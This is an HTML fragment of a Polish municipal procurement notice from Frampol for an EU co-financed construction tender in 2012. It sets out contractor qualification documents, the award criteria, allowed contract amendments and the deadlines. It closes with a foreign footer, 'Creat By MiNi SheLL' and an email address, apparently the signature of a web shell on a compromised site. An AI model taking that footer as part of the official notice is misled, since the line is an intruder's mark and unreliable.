<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany  postanowień umowy  w zakresie:

1. terminu wykonania przedmiotu umowy
    i pozostałych terminów określonych w umowie

                       1) poprzez przedłużenie:
                                          w sytuacji :
1)	gdy wystąpią okoliczności ,  których nie można było przewidzieć , a które mają istotny  wpływ na terminową realizację umowy,
2)	niedopełnienia przez Wykonawcę określonych w umowie należących do niego  obowiązków ,
3)   zaistnieje konieczność przerwania lub zawieszenia robót z przyczyn
      niezawinionych przez Wykonawcę,
4)	działania siły wyższej uniemożliwiającej realizację przedmiotu umowy,
2)	poprzez skrócenie:
w sytuacji gdy zostaną spełnione łącznie dwie przesłanki:
a)  Wykonawca wcześniej niż się się Strony umówiły w Umowie
    wykonana poszczególne etapy i elementy robót i  Zamawiający uzna ,że    
  roboty zostały zakończone i nie będzie miał zastrzeżeń , co do kompletności
  i prawidłowości dokumentacji powykonawczej,
                                   b) Zamawiający będzie w stanie dokonać zapłaty wynagrodzenia Wykonawcy    
                                        za  wcześniej wykonany przedmiot umowy lub Etap.

2.	w zakresie wysokości wynagrodzenia Wykonawcy.
- w razie zaistnienia okoliczności , których nie można było
  przewidzieć  w chwili  składania oferty i zawarcia Umów, do których zalicza się tylko ustawową zmianę  stawek podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.frampol.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski we Frampolu ul.Radzięcka 8, 23-440 Frampol.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2012 godzina 12:00, miejsce: Urząd Miejski we Frampolu ul.Radzięcka 8, 23-440 Frampol
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego 
Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com